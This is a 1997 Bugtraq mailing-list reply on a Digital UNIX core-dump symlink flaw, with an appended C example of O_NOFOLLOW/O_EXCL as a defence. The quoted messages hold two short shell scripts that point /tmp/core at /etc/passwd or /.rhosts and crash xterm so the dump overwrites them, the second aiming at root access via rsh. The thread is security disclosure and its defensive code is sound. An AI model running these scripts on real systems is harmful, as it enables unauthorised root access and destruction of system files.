[5607] in bugtraq


Re: Digital Unix Security Problem

daemon@ATHENA.MIT.EDU (Tom Leffingwell)
Fri Nov 14 13:40:40 1997

Date: 	Thu, 13 Nov 1997 18:22:58 -0500
Reply-To: Tom Leffingwell <tom@SBA.MIAMI.EDU>
From: Tom Leffingwell <tom@SBA.MIAMI.EDU>
X-To:         Andrew Brown <codewarrior@daemon.org>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <199711131632.LAA02326@untraceable.net>

DU doesn't allow +'s in /.rhosts, at least under C2, and I think so in
general.  It doesn't seem to work even if you specify a user, either.

On Thu, 13 Nov 1997, Andrew Brown wrote:

> >        Even with a buffer overflow, I've never seen anyone exploit on one
> >DU. If anyone has done so successfully, please email me.  Despite that, a
> >person with basic knowledge of unix could easily do something like:
> >
> >#!/bin/csh
> >cd /tmp
> >ln -s /etc/passwd /tmp/core
> >setenv DISPLAY abcdefghi
> >/usr/bin/X11/xterm
> >
> >        The contents of /etc/passwd becomes xterm's core, preventing
> >further logins.  Obviously you could do things without an immediate impact
> >such as ln -s /vmunix /tmp/core.
>
> or...if the system you're on is actually running r-services, you could do
>
> #!/bin/sh
> DISPLAY="
> + +
> "
> export DISPLAY
> cd /tmp
> ln -s /.rhosts /tmp/core
> /usr/bin/X11/xterm
> rsh localhost
>
> which sets the DISPLAY variable to an "admit all from all" line and
> the core dump will go into root's .rhosts file.  then all that remains
> is the rsh localhost and you're all set!
>
> considerably easier than a buffer overflow exploit...
>
> --
> |-----< "CODE WARRIOR" >-----|
> andrew@echonyc.com (TheMan)        * "ah!  i see you have the internet
> codewarrior@daemon.org                               that goes *ping*!"
> warfare@graffiti.com      * "information is power -- share the wealth."
>
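
The defence against the trick traded back and forth in this thread is for the dump writer never to write through an entry somebody else planted at the path. As an added example, not code from the thread or from Digital UNIX, the C program below shows the open() flags that achieve this, rebuilding the setup in a constructed temp directory (standing in for /tmp) with a throwaway file named "victim" (standing in for /etc/passwd or /.rhosts); both names are assumptions.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a dump file without writing through a pre-planted entry:
 * O_NOFOLLOW refuses a symlink at the last component (ELOOP) and
 * O_CREAT|O_EXCL refuses any existing entry (EEXIST).
 * Returns an open fd, or -1 with errno set. */
int open_dump_file(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Rebuild the thread's setup in a constructed temp dir (standing in for
 * /tmp) with a throwaway "victim" file (standing in for /etc/passwd):
 * plant core -> victim, then try to create the dump. Returns 1 if the
 * open was refused and victim is untouched, 0 otherwise. */
int demo_refuses_planted_symlink(void)
{
    char dir[] = "/tmp/coredemoXXXXXX";
    char victim[PATH_MAX], core[PATH_MAX];
    struct stat st;
    int fd, ok = 0;

    if (mkdtemp(dir) == NULL) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(core, sizeof core, "%s/core", dir);

    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) goto out;
    if (write(fd, "secret\n", 7) != 7) { close(fd); goto out; }
    close(fd);
    if (symlink(victim, core) != 0) goto out;

    fd = open_dump_file(core);              /* the planted link */
    if (fd >= 0) { close(fd); goto out; }   /* followed it: failure */
    if (errno != ELOOP && errno != EEXIST) goto out;

    ok = (stat(victim, &st) == 0 && st.st_size == 7); /* still 7 bytes */
out:
    unlink(core); unlink(victim); rmdir(dir);
    return ok;
}
```

Calling demo_refuses_planted_symlink() returns 1 on a system whose open() honours O_NOFOLLOW and O_EXCL; the same two flags are what a core-dump writer (or any privileged program creating files in a world-writable directory) needs.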
